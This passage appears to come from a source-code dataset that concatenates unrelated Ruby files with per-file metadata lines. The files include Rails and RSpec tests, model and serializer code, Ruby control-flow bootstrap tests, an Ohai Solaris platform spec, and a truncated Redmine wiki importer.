assert_raise(ArgumentError) { @person.load nil }
assert_raise(ArgumentError) { @person.load '<person id="1"/>' }
end
def test_load_simple_hash
assert_equal Hash.new, @person.attributes
assert_equal @matz.stringify_keys, @person.load(@matz).attributes
end
def test_load_one_with_existing_resource
address = @person.load(:street_address => @first_address).street_address
assert_kind_of StreetAddress, address
assert_equal @first_address.stringify_keys, address.attributes
end
def test_load_one_with_unknown_resource
address = silence_warnings { @person.load(:address => @first_address).address }
assert_kind_of Person::Address, address
assert_equal @first_address.stringify_keys, address.attributes
end
def test_load_collection_with_existing_resource
addresses = @person.load(@addresses_from_xml).street_addresses
assert_kind_of Array, addresses
addresses.each { |address| assert_kind_of StreetAddress, address }
assert_equal @addresses.map(&:stringify_keys), addresses.map(&:attributes)
end
def test_load_collection_with_unknown_resource
Person.send(:remove_const, :Address) if Person.const_defined?(:Address)
assert !Person.const_defined?(:Address), "Address shouldn't exist until autocreated"
addresses = silence_warnings { @person.load(:addresses => @addresses).addresses }
assert Person.const_defined?(:Address), "Address should have been autocreated"
addresses.each { |address| assert_kind_of Person::Address, address }
assert_equal @addresses.map(&:stringify_keys), addresses.map(&:attributes)
end
def test_load_collection_with_single_existing_resource
addresses = @person.load(@addresses_from_xml_single).street_addresses
assert_kind_of Array, addresses
addresses.each { |address| assert_kind_of StreetAddress, address }
assert_equal [ @first_address ].map(&:stringify_keys), addresses.map(&:attributes)
end
def test_load_collection_with_single_unknown_resource
Person.send(:remove_const, :Address) if Person.const_defined?(:Address)
assert !Person.const_defined?(:Address), "Address shouldn't exist until autocreated"
addresses = silence_warnings { @person.load(:addresses => [ @first_address ]).addresses }
assert Person.const_defined?(:Address), "Address should have been autocreated"
addresses.each { |address| assert_kind_of Person::Address, address }
assert_equal [ @first_address ].map(&:stringify_keys), addresses.map(&:attributes)
end
def test_recursively_loaded_collections
person = @person.load(@deep)
assert_equal @deep[:id], person.id
street = person.street
assert_kind_of Person::Street, street
assert_equal @deep[:street][:id], street.id
state = street.state
assert_kind_of Person::Street::State, state
assert_equal @deep[:street][:state][:id], state.id
rivers = state.notable_rivers
assert_kind_of Array, rivers
assert_kind_of Person::Street::State::NotableRiver, rivers.first
assert_equal @deep[:street][:state][:notable_rivers].first[:id], rivers.first.id
assert_equal @matz[:id], rivers.last.rafted_by.id
end
def test_nested_collections_within_the_same_namespace
n = Highrise::Note.new(:comments => [{ :name => "1" }])
assert_kind_of Highrise::Comment, n.comments.first
end
end | 38.945946 | 93 | 0.718714 |
d57e14496097360d12d819418db9706c17261875 | 5,002 | =begin
#Selling Partner APIs for Fulfillment Outbound
#The Selling Partner API for Fulfillment Outbound lets you create applications that help a seller fulfill Multi-Channel Fulfillment orders using their inventory in Amazon's fulfillment network. You can get information on both potential and existing fulfillment orders.
OpenAPI spec version: 2020-07-01
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.26
=end
# load the gem
require 'fulfillment-outbound-api-model'
# The following was generated by the `rspec --init` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
#
# The `.rspec` file also contains a few flags that are not defaults but that
# users commonly want.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
=begin
# These two settings work together to allow you to limit a spec run
# to individual examples or groups you care about by tagging them with
# `:focus` metadata. When nothing is tagged with `:focus`, all examples
# get run.
config.filter_run :focus
config.run_all_when_everything_filtered = true
# Allows RSpec to persist some state between runs in order to support
# the `--only-failures` and `--next-failure` CLI options. We recommend
# you configure your source control system to ignore this file.
config.example_status_persistence_file_path = "spec/examples.txt"
# Limits the available syntax to the non-monkey patched syntax that is
# recommended. For more details, see:
# - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/
# - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode
config.disable_monkey_patching!
# This setting enables warnings. It's recommended, but in some cases may
# be too noisy due to issues in dependencies.
config.warnings = true
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = 'doc'
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
=end
end
| 44.660714 | 268 | 0.748501 |
abf835860776b8aef817ebda9fa42aeee0a50176 | 154 | class VisitSerializer < ActiveModel::Serializer
# Attributes emitted in the serialized Visit payload.
attributes :id, :city_rating, :avatar, :user_id, :avatar_url
# Associations serialized alongside the visit.
belongs_to :user
belongs_to :city
end
| 22 | 62 | 0.766234 |
bf025a4c3c093b293785d526e6ece1a3b668a19f | 1,590 | require "rails_helper"
# Validation specs: a bare factor set must report each required field.
describe CompositeRatingTierFactorSet do
let(:validation_errors) {
subject.valid?
subject.errors
}
it "requires a carrier profile" do
expect(validation_errors.has_key?(:carrier_profile_id)).to be_truthy
end
it "requires a default factor value" do
expect(validation_errors.has_key?(:default_factor_value)).to be_truthy
end
it "requires an active year" do
expect(validation_errors.has_key?(:active_year)).to be_truthy
end
end
# With all required fields but no rating factor entries, lookups fall back
# to the default factor value.
describe CompositeRatingTierFactorSet, "given
- a carrier profile
- an active year
- a default factor value
- no rating factor entries
" do
let(:default_factor_value) { 1.234567 }
let(:carrier_profile_id) { BSON::ObjectId.new }
let(:active_year) { 2015 }
subject do
CompositeRatingTierFactorSet.new({
:default_factor_value => default_factor_value,
:active_year => active_year,
:carrier_profile_id => carrier_profile_id
})
end
it "is valid" do
expect(subject.valid?).to be_truthy
end
it "returns the default factor on all lookups" do
expect(subject.lookup(:bdklajdlfs)).to eq default_factor_value
end
end
# With an explicit rating factor entry, lookups by its key return its value.
describe CompositeRatingTierFactorSet, "given
- a rating factor entry with key 'abc' and value '1.345'
" do
subject do
CompositeRatingTierFactorSet.new({
:rating_factor_entries => [
RatingFactorEntry.new({
:factor_key => 'abc',
:factor_value => 1.345
})
]
})
end
it "returns the '1.345' for a lookup of 'abc'" do
expect(subject.lookup('abc')).to eq 1.345
end
end
| 22.394366 | 76 | 0.697484 |
f7c3cf748f9a33d386ae56a3dd2f69358be76a46 | 1,094 | # frozen_string_literal: true
module EE
module Sidebars
module Projects
# EE extension of the project sidebar panel: injects EE-only menus and
# drops entries superseded by the Jira integration.
module Panel
extend ::Gitlab::Utils::Override
override :configure_menus
def configure_menus
super
# Place the trial-experiment menu just above project information.
insert_menu_before(::Sidebars::Projects::Menus::ProjectInformationMenu,
::Sidebars::Projects::Menus::TrialExperimentMenu.new(context))
# When Jira menu items are shown, the generic external issue tracker
# entry is redundant.
if ::Sidebars::Projects::Menus::IssuesMenu.new(context).show_jira_menu_items?
remove_menu(::Sidebars::Projects::Menus::ExternalIssueTrackerMenu)
end
add_billing_sidebar_menu
end
private
# Adds the billing menu after Settings, but only for users in the
# experiment's candidate arm; the control arm leaves the sidebar as-is.
def add_billing_sidebar_menu
experiment(:billing_in_side_nav, actor: context.current_user, namespace: context.project.namespace.root_ancestor, sticky_to: context.current_user) do |e|
e.control {}
e.candidate do
insert_menu_after(::Sidebars::Projects::Menus::SettingsMenu, ::Sidebars::Projects::Menus::BillingMenu.new(context))
end
end
end
end
end
end
end
| 29.567568 | 163 | 0.63894 |
ffdc8b0c67f4b70e72caab64b338e5b138aaa297 | 411 | class EventTranslation < ActiveRecord::Base
# Mass-assignable attributes (Rails 3-style attr_accessible).
attr_accessible :event_id, :name, :locale, :name_abbrv, :description
belongs_to :event
validates :name, :locale, :presence => true
# NOTE: validating event_id presence always fails here because translations
# are created while the parent event is still being created (no id yet);
# left disabled until that ordering is fixed.
# validates :event_id, :presence => true
# Default ordering applied to every query on this model.
default_scope order('locale ASC, name ASC')
end
| 34.25 | 74 | 0.746959 |
d5a909625b9c6bf2ab4ed26395974357f7dccac3 | 774 | Pod::Spec.new do |s|
s.name = 'TOCropViewController'
s.version = '2.5.5'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.summary = 'A view controller that enables cropping and rotation of UIImage objects.'
s.homepage = 'https://github.com/TimOliver/TOCropViewController'
s.author = 'Tim Oliver'
s.source = { :git => 'https://github.com/TimOliver/TOCropViewController.git', :tag => s.version }
s.platform = :ios, '8.0'
s.source_files = 'Objective-C/TOCropViewController/**/*.{h,m}'
s.exclude_files = 'Objective-C/TOCropViewController/include/**/*.h'
s.resource_bundles = {
'TOCropViewControllerBundle' => ['Objective-C/TOCropViewController/**/*.lproj','Objective-C/TOCropViewController/**/*.bundle']
}
s.requires_arc = true
end
| 45.529412 | 130 | 0.677003 |
5d9f09ff89f4994502a60f2216fc8fdd21edf3a2 | 43 | # typed: true
# Trivial method whose return value (nil) is interpolated below.
def bar; end;
# Regexp literal with interpolation — nil interpolates as the empty string,
# so at runtime this is equivalent to /foobaz/.
/foo#{bar}baz/
| 10.75 | 14 | 0.627907 |
385d01007d2288b5d6f5111ad13f391bc21a0b84 | 960 | # frozen_string_literal: true
require 'test_helper'
module Users
class OperatorTest < ActiveSupport::TestCase
# Creating a Users::Operator links it to its Operator record and
# assigns an api_token.
test 'creation works' do
operator = create(:operator)
user_operator = Users::Operator.create(first_name: 'Martin',
last_name: 'Fourcade',
email: '[email protected]',
password: 'okokok',
operator_id: operator.id,
accept_terms: true)
assert_equal operator, user_operator.operator
assert_not_nil user_operator.api_token
end
# An operator user sees internship offers it employs.
test 'association.internship_offers' do
operator = create(:user_operator)
internship_offer = create(:weekly_internship_offer, employer: operator)
operator.reload
assert_equal internship_offer, operator.internship_offers.first
end
end
end
| 35.555556 | 77 | 0.569792 |
0390062a2435cc3a2200e3b6c3f471de083ffd8c | 13,012 | assert_equal %q{[1, 2, 4, 5, 6, 7, 8]}, %q{$a = []; begin; ; $a << 1
[1,2].each{; $a << 2
break; $a << 3
}; $a << 4
begin; $a << 5
ensure; $a << 6
end; $a << 7
; $a << 8
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 5, 6, 7, 8]}, %q{$a = []; begin; ; $a << 1
begin; $a << 2
[1,2].each do; $a << 3
break; $a << 4
end; $a << 5
ensure; $a << 6
end; $a << 7
; $a << 8
; rescue Exception; $a << 99; end; $a}
assert_equal %q{ok}, %q{
["a"].inject("ng"){|x,y|
break :ok
}
}
assert_equal %q{ok}, %q{
unless ''.respond_to? :lines
class String
def lines
self
end
end
end
('a').lines.map{|e|
break :ok
}
}
assert_equal %q{[1, 2, 4, 5]}, %q{$a = []; begin; ; $a << 1
["a"].inject("ng"){|x,y|; $a << 2
break :ok; $a << 3
}; $a << 4
; $a << 5
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 4, 5]}, %q{$a = []; begin; ; $a << 1
('a'..'b').map{|e|; $a << 2
break :ok; $a << 3
}; $a << 4
; $a << 5
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 5, 7, 8]}, %q{$a = []; begin; ; $a << 1
[1,2].each do; $a << 2
begin; $a << 3
break; $a << 4
ensure; $a << 5
end; $a << 6
end; $a << 7
; $a << 8
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 6, 9, 10]}, %q{$a = []; begin; ; $a << 1
i=0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
begin; $a << 5
ensure; $a << 6
break; $a << 7
end; $a << 8
end; $a << 9
; $a << 10
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 7, 10, 11]}, %q{$a = []; begin; ; $a << 1
i=0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
begin; $a << 5
raise; $a << 6
ensure; $a << 7
break; $a << 8
end; $a << 9
end; $a << 10
; $a << 11
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 7, 10, 11]}, %q{$a = []; begin; ; $a << 1
i=0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
begin; $a << 5
raise; $a << 6
rescue; $a << 7
break; $a << 8
end; $a << 9
end; $a << 10
; $a << 11
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 5, 8, 9]}, %q{$a = []; begin; ; $a << 1
[1,2].each do; $a << 2
begin; $a << 3
raise StandardError; $a << 4
ensure; $a << 5
break; $a << 6
end; $a << 7
end; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 5, 8, 9]}, %q{$a = []; begin; ; $a << 1
[1,2].each do; $a << 2
begin; $a << 3
raise StandardError; $a << 4
rescue; $a << 5
break; $a << 6
end; $a << 7
end; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 6, 8, 10, 11]}, %q{$a = []; begin; ; $a << 1
[1,2].each do; $a << 2
begin; $a << 3
begin; $a << 4
break; $a << 5
ensure; $a << 6
end; $a << 7
ensure; $a << 8
end; $a << 9
end; $a << 10
; $a << 11
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 6, 7, 8, 10, 13, 3, 4, 5, 6, 7, 8, 10, 13, 3, 4, 5, 6, 7, 8, 10, 13, 14, 15]}, %q{$a = []; begin; ; $a << 1
i = 0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
j = 0; $a << 5
while j<3; $a << 6
j+=1; $a << 7
begin; $a << 8
raise; $a << 9
rescue; $a << 10
break; $a << 11
end; $a << 12
end; $a << 13
end; $a << 14
; $a << 15
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 15, 3, 4, 5, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 15, 3, 4, 5, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 15, 16, 17]}, %q{$a = []; begin; ; $a << 1
i = 0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
j = 0; $a << 5
while j<3; $a << 6
j+=1; $a << 7
1.times{; $a << 8
begin; $a << 9
raise; $a << 10
rescue; $a << 11
break; $a << 12
end; $a << 13
}; $a << 14
end; $a << 15
end; $a << 16
; $a << 17
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 6, 7, 8, 10, 13, 3, 4, 5, 6, 7, 8, 10, 13, 3, 4, 5, 6, 7, 8, 10, 13, 14, 15]}, %q{$a = []; begin; ; $a << 1
i = 0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
j = 0; $a << 5
while j<3; $a << 6
j+=1; $a << 7
begin; $a << 8
raise; $a << 9
ensure; $a << 10
break; $a << 11
end; $a << 12
end; $a << 13
end; $a << 14
; $a << 15
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 15, 3, 4, 5, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 15, 3, 4, 5, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 6, 7, 8, 9, 11, 14, 15, 16, 17]}, %q{$a = []; begin; ; $a << 1
i = 0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
j = 0; $a << 5
while j<3; $a << 6
j+=1; $a << 7
1.times{; $a << 8
begin; $a << 9
raise; $a << 10
ensure; $a << 11
break; $a << 12
end; $a << 13
}; $a << 14
end; $a << 15
end; $a << 16
; $a << 17
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 5, 8, 9]}, %q{$a = []; begin; ; $a << 1
while true; $a << 2
begin; $a << 3
break; $a << 4
ensure; $a << 5
break; $a << 6
end; $a << 7
end; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 5, 99]}, %q{
$a = [];
begin; ; $a << 1
while true; $a << 2
begin; $a << 3
break; $a << 4
ensure; $a << 5
raise; $a << 6
end; $a << 7
end; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 6, 8, 9, 10, 11]}, %q{$a = []; begin; ; $a << 1
begin; $a << 2
[1,2].each do; $a << 3
begin; $a << 4
break; $a << 5
ensure; $a << 6
end; $a << 7
end; $a << 8
ensure; $a << 9
end; $a << 10
; $a << 11
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 4, 99]}, %q{$a = []; begin; ; $a << 1
begin; $a << 2
raise StandardError; $a << 3
ensure; $a << 4
end; $a << 5
; $a << 6
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4]}, %q{$a = []; begin; ; $a << 1
begin; $a << 2
ensure; $a << 3
end ; $a << 4
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 5, 99]}, %q{$a = []; begin; ; $a << 1
[1,2].each do; $a << 2
begin; $a << 3
break; $a << 4
ensure; $a << 5
raise StandardError; $a << 6
end; $a << 7
end; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{3}, %q{
def m a, b
a + b
end
m(1,
while true
break 2
end
)
}
assert_equal %q{4}, %q{
def m a, b
a + b
end
m(1,
(i=0; while i<2
i+=1
class C
next 2
end
end; 3)
)
}
assert_equal %q{34}, %q{
def m a, b
a+b
end
m(1, 1.times{break 3}) +
m(10, (1.times{next 3}; 20))
}
assert_equal %q{[1, 2, 3, 6, 7]}, %q{$a = []; begin; ; $a << 1
3.times{; $a << 2
class C; $a << 3
break; $a << 4
end; $a << 5
}; $a << 6
; $a << 7
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 8, 9]}, %q{$a = []; begin; ; $a << 1
3.times{; $a << 2
class A; $a << 3
class B; $a << 4
break; $a << 5
end; $a << 6
end; $a << 7
}; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 2, 3, 2, 3, 6, 7]}, %q{$a = []; begin; ; $a << 1
3.times{; $a << 2
class C; $a << 3
next; $a << 4
end; $a << 5
}; $a << 6
; $a << 7
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 2, 3, 4, 2, 3, 4, 8, 9]}, %q{$a = []; begin; ; $a << 1
3.times{; $a << 2
class C; $a << 3
class D; $a << 4
next; $a << 5
end; $a << 6
end; $a << 7
}; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 6, 7]}, %q{$a = []; begin; ; $a << 1
while true; $a << 2
class C; $a << 3
break; $a << 4
end; $a << 5
end; $a << 6
; $a << 7
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 8, 9]}, %q{$a = []; begin; ; $a << 1
while true; $a << 2
class C; $a << 3
class D; $a << 4
break; $a << 5
end; $a << 6
end; $a << 7
end; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 3, 4, 5, 3, 4, 5, 3, 4, 5, 8, 9]}, %q{$a = []; begin; ; $a << 1
i=0; $a << 2
while i<3; $a << 3
i+=1; $a << 4
class C; $a << 5
next 10; $a << 6
end; $a << 7
end; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{1}, %q{
1.times{
while true
class C
begin
break
ensure
break
end
end
end
}
}
assert_equal %q{[1, 2, 3, 5, 2, 3, 5, 7, 8]}, %q{$a = []; begin; ; $a << 1
[1,2].each do; $a << 2
begin; $a << 3
next; $a << 4
ensure; $a << 5
end; $a << 6
end; $a << 7
; $a << 8
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 2, 6, 3, 5, 7, 8]}, %q{$a = []; begin; ; $a << 1
o = "test"; $a << 2
def o.test(a); $a << 3
return a; $a << 4
ensure; $a << 5
end; $a << 6
o.test(123); $a << 7
; $a << 8
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 4, 7, 5, 8, 9]}, %q{$a = []; begin; ; $a << 1
def m1 *args; $a << 2
; $a << 3
end; $a << 4
def m2; $a << 5
m1(:a, :b, (return 1; :c)); $a << 6
end; $a << 7
m2; $a << 8
; $a << 9
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 8, 2, 3, 4, 5, 9, 10]}, %q{$a = []; begin; ; $a << 1
def m(); $a << 2
begin; $a << 3
2; $a << 4
ensure; $a << 5
return 3; $a << 6
end; $a << 7
end; $a << 8
m; $a << 9
; $a << 10
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 3, 11, 4, 5, 6, 7, 12, 13]}, %q{$a = []; begin; ; $a << 1
def m2; $a << 2
end; $a << 3
def m(); $a << 4
m2(begin; $a << 5
2; $a << 6
ensure; $a << 7
return 3; $a << 8
end); $a << 9
4; $a << 10
end; $a << 11
m(); $a << 12
; $a << 13
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[1, 16, 2, 3, 4, 5, 6, 7, 10, 11, 17, 18]}, %q{$a = []; begin; ; $a << 1
def m; $a << 2
1; $a << 3
1.times{; $a << 4
2; $a << 5
begin; $a << 6
3; $a << 7
return; $a << 8
4; $a << 9
ensure; $a << 10
5; $a << 11
end; $a << 12
6; $a << 13
}; $a << 14
7; $a << 15
end; $a << 16
m(); $a << 17
; $a << 18
; rescue Exception; $a << 99; end; $a}
assert_equal %q{[:ok, :ok2, :last]}, %q{
a = []
i = 0
begin
while i < 1
i+=1
begin
begin
next
ensure
a << :ok
end
ensure
a << :ok2
end
end
ensure
a << :last
end
a
}
assert_equal %q{[:ok, :ok2, :last]}, %q{
a = []
i = 0
begin
while i < 1
i+=1
begin
begin
break
ensure
a << :ok
end
ensure
a << :ok2
end
end
ensure
a << :last
end
a
}
assert_equal %q{[:ok, :ok2, :last]}, %q{
a = []
i = 0
begin
while i < 1
if i>0
break
end
i+=1
begin
begin
redo
ensure
a << :ok
end
ensure
a << :ok2
end
end
ensure
a << :last
end
a
}
assert_equal %Q{ENSURE\n}, %q{
def test
while true
return
end
ensure
puts("ENSURE")
end
test
}, '[ruby-dev:37967]'
[['[ruby-core:28129]', %q{
class Bug2728
include Enumerable
define_method(:dynamic_method) do
"dynamically defined method"
end
def each
begin
yield :foo
ensure
dynamic_method
end
end
end
e = Bug2728.new
}],
['[ruby-core:28132]', %q{
class Bug2729
include Enumerable
def each
begin
yield :foo
ensure
proc {}.call
end
end
end
e = Bug2729.new
}],
['[ruby-core:39125]', %q{
class Bug5234
include Enumerable
def each
begin
yield :foo
ensure
proc
end
end
end
e = Bug5234.new
}],
['[ruby-dev:45656]', %q{
class Bug6460
include Enumerable
def each
begin
yield :foo
ensure
1.times { Proc.new }
end
end
end
e = Bug6460.new
}]].each do |bug, src|
assert_equal "foo", src + %q{e.detect {true}}, bug
assert_equal "true", src + %q{e.any? {true}}, bug
assert_equal "false", src + %q{e.all? {false}}, bug
assert_equal "true", src + %q{e.include?(:foo)}, bug
end
assert_equal "foo", %q{
class Bug6460
def m1
m2 {|e|
return e
}
end
def m2
begin
yield :foo
ensure
begin
begin
yield :foo
ensure
Proc.new
raise ''
end
rescue
end
end
end
end
Bug6460.new.m1
}, '[ruby-dev:46372]'
| 21.97973 | 280 | 0.40747 |
1c813f7215944ec6871e7536de36774cd3b5d9f3 | 3,061 | #
# Author:: Trevor O (<[email protected]>)
# Copyright:: Copyright (c) 2009-2016 Chef Software, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require File.expand_path(File.dirname(__FILE__) + "/../../../spec_helper.rb")
# Verifies the solaris2/platform Ohai plugin: it must distinguish SmartOS
# from stock Solaris via /etc/release and extract version/build from
# `uname -X` output.
describe Ohai::System, "Solaris plugin platform" do
  before(:each) do
    @plugin = get_plugin("solaris2/platform")
    allow(@plugin).to receive(:collect_os).and_return(:solaris2)
    # Default stub; each nested context overrides it with fixture output.
    allow(@plugin).to receive(:shell_out).with("/sbin/uname -X")
  end
  describe "on SmartOS" do
    before(:each) do
      # Captured `uname -X` output from a SmartOS (Joyent) system.
      @uname_x = <<-UNAME_X
System = SunOS
Node = node.example.com
Release = 5.11
KernelID = joyent_20120130T201844Z
Machine = i86pc
BusType = <unknown>
Serial = <unknown>
Users = <unknown>
OEM# = 0
Origin# = 1
NumCPU = 16
UNAME_X
      allow(File).to receive(:exists?).with("/sbin/uname").and_return(true)
      allow(@plugin).to receive(:shell_out).with("/sbin/uname -X").and_return(mock_shell_out(0, @uname_x, ""))
      # /etc/release is the discriminator between SmartOS and Solaris.
      @release = StringIO.new("  SmartOS 20120130T201844Z x86_64\n")
      allow(File).to receive(:open).with("/etc/release").and_yield(@release)
    end
    it "should run uname and set platform and build" do
      @plugin.run
      expect(@plugin[:platform_build]).to eq("joyent_20120130T201844Z")
    end
    it "should set the platform" do
      @plugin.run
      expect(@plugin[:platform]).to eq("smartos")
    end
    it "should set the platform_version" do
      @plugin.run
      expect(@plugin[:platform_version]).to eq("5.11")
    end
  end
  describe "on Solaris 11" do
    before(:each) do
      # Captured `uname -X` output from an Oracle Solaris 11.1 system.
      @uname_x = <<-UNAME_X
System = SunOS
Node = node.example.com
Release = 5.11
KernelID = 11.1
Machine = i86pc
BusType = <unknown>
Serial = <unknown>
Users = <unknown>
OEM# = 0
Origin# = 1
NumCPU = 1
UNAME_X
      allow(File).to receive(:exists?).with("/sbin/uname").and_return(true)
      allow(@plugin).to receive(:shell_out).with("/sbin/uname -X").and_return(mock_shell_out(0, @uname_x, ""))
      @release = StringIO.new("  Oracle Solaris 11.1 X86\n")
      allow(File).to receive(:open).with("/etc/release").and_yield(@release)
    end
    it "should run uname and set platform and build" do
      @plugin.run
      expect(@plugin[:platform_build]).to eq("11.1")
    end
    it "should set the platform" do
      @plugin.run
      expect(@plugin[:platform]).to eq("solaris2")
    end
    it "should set the platform_version" do
      @plugin.run
      expect(@plugin[:platform_version]).to eq("5.11")
    end
  end
end
| 28.082569 | 110 | 0.671023 |
01587c6a433be8498add2effade618da616b1e7d | 3,251 | require 'caramelize/input_wiki/wiki'
require 'caramelize/filters/swap_wiki_links'
require 'caramelize/filters/remove_table_tab_line_endings'
module Caramelize
  module InputWiki
    # Imports pages, revisions and authors from a Redmine wiki database.
    #
    # Redmine hosts one wiki per project; project identifiers are exposed as
    # namespaces and page titles are prefixed with "<project>/" so pages from
    # different projects cannot collide in the target wiki.
    class RedmineWiki < Wiki
      include DatabaseConnector

      # Configure Redmine-specific defaults: pages are stored as Textile and
      # need link/table markup normalisation before conversion.
      def initialize(options = {})
        super(options)
        @options[:markup] = :textile
        @options[:filters] << Caramelize::SwapWikiLinks
        @options[:filters] << Caramelize::RemoveTableTabLineEndings
        @options[:create_namespace_overview] = true
      end

      # Read every page revision from the database.
      #
      # After calling this, +titles+ holds the unique page titles and
      # +revisions+ holds all revisions ordered by timestamp (oldest first).
      #
      # @return [Array<Page>] all revisions, oldest first
      def read_pages
        add_projects_as_namespaces
        pages.each { |row_page| build_page(row_page) }
        titles.uniq!
        revisions.sort_by!(&:time)
        revisions
      end

      # Load all users into the +authors+ hash, keyed by database id.
      #
      # @return [Hash{Integer => OpenStruct}] id => author (id, name, email)
      def read_authors
        database.query(authors_query).each do |row|
          authors[row["id"]] = OpenStruct.new(id: row["id"],
                                              name: row["login"],
                                              email: row["mail"])
        end
        authors
      end

      private

      # Append the title and every revision of a single wiki_pages row.
      def build_page(row_page)
        row_contents = database.query(single_page_query(row_page['id']))
        wiki = wikis.find { |row| row['id'] == row_page['wiki_id'] }
        project_identifier = ''
        if wiki
          project = projects.find { |row| row['id'] == wiki['project_id'] }
